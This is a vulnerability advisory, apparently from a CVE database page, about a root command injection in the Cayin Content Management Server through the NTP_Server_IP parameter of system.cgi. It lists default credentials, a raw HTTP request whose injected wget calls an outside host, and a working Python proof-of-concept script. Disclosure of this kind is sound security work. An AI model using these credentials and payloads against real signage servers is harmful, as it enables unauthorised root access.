9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
10 High
AI Score
Confidence
High
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.959 High
EPSS
Percentile
99.4%
Title: Cayin Content Management Server 11.0 Root Remote Command Injection
Advisory ID: ZSL-2020-5570
Type: Local/Remote
Impact: System Access, DoS
Risk: (4/5)
Release Date: 04.06.2020
CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you donât have to do the hard work.
CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the âNTP_Server_IPâ HTTP POST parameter in system.cgi page.
CAYIN Technology Co., Ltd. - <https://www.cayintech.com>
CMS-SE v11.0 Build 19179
CMS-SE v11.0 Build 19025
CMS-SE v11.0 Build 18325
CMS Station (CMS-SE-LXC)
CMS-60 v11.0 Build 19025
CMS-40 v9.0 Build 14197
CMS-40 v9.0 Build 14099
CMS-40 v9.0 Build 14093
CMS-20 v9.0 Build 14197
CMS-20 v9.0 Build 14092
CMS v8.2 Build 12199
CMS v8.0 Build 11175
CMS v7.5 Build 11175
Apache/1.3.42 (Unix)
[15.05.2020] Vulnerability discovered.
[23.05.2020] Vendor contacted.
[25.05.2020] Vendor responds asking more details.
[25.05.2020] Sent details to the vendor.
[04.06.2020] No response from the vendor.
[04.06.2020] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.exploit-db.com/exploits/48553>
[2] <https://packetstormsecurity.com/files/157944>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/182925>
[4] <https://cxsecurity.com/issue/WLB-2020060076>
[5] <https://blog.rapid7.com/2020/06/19/metasploit-wrap-up-69/>
[6] <https://github.com/rapid7/metasploit-framework/pull/13607>
[7] <https://www.rapid7.com/db/modules/exploit/linux/http/cayin_cms_ntp>
[8] <https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/cayin_cms_ntp.rb>
[9] <https://vulners.com/cve/CVE-2020-7357>
[10] <https://packetstormsecurity.com/files/158139>
[04.06.2020] - Initial release
[05.06.2020] - Added reference [1], [2] and [3]
[22.06.2020] - Added reference [4], [5], [6], [7], [8] and [9]
[03.07.2020] - Added reference [10]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Cayin Content Management Server 11.0 Root Remote Command Injection
Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com
Affected version: CMS-SE v11.0 Build 19179
CMS-SE v11.0 Build 19025
CMS-SE v11.0 Build 18325
CMS Station (CMS-SE-LXC)
CMS-60 v11.0 Build 19025
CMS-40 v9.0 Build 14197
CMS-40 v9.0 Build 14099
CMS-40 v9.0 Build 14093
CMS-20 v9.0 Build 14197
CMS-20 v9.0 Build 14092
CMS v8.2 Build 12199
CMS v8.0 Build 11175
CMS v7.5 Build 11175
Summary: CAYIN Technology provides Digital Signage
solutions, including media players, servers, and
software designed for the DOOH (Digital Out-of-home)
networks. We develop industrial-grade digital signage
appliances and tailored services so you don't have
to do the hard work.
Desc: CAYIN CMS suffers from an authenticated OS
semi-blind command injection vulnerability using
default credentials. This can be exploited to inject
and execute arbitrary shell commands as the root
user through the 'NTP_Server_IP' HTTP POST parameter
in system.cgi page.
Tested on: Apache/1.3.42 (Unix)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
15.05.2020
---
Session created with default credentials (webadmin:bctvadmin).
HTTP POST Request:
-----------------
POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close
save_system: 1
system_date: 2020/5/16 06:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 渏芌
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW
Request recorder @ ZSL:
-----------------------
Origin of HTTP request: 192.168.1.3:61347
HTTP GET request to vrfy.zeroscience.mk:
GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive
PoC script:
-----------
import requests
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
cookies = {"cy_lang": "ZH_TW",
"cy_us": "67176fd7d3d05812008",
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
"cy_cgi_tp": "1591206269_15957"}
headers = {"Cache-Control": "max-age=0",
"Origin": "http://192.168.1.3",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Smith",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"}
data = {"save_system": "1",
"system_date": "2020/5/16 06:36:48",
"TIMEZONE": "49",
"NTP_Service": "1",
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
"reboot1": "1",
"reboot_sel1": "4",
"reboot_sel2": "1",
"reboot_sel3": "1",
"font_list": "ZH_TW"}
requests.post(url, headers=headers, cookies=cookies, data=data)
</p></body></html>
9.9 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
10 High
AI Score
Confidence
High
9 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
0.959 High
EPSS
Percentile
99.4%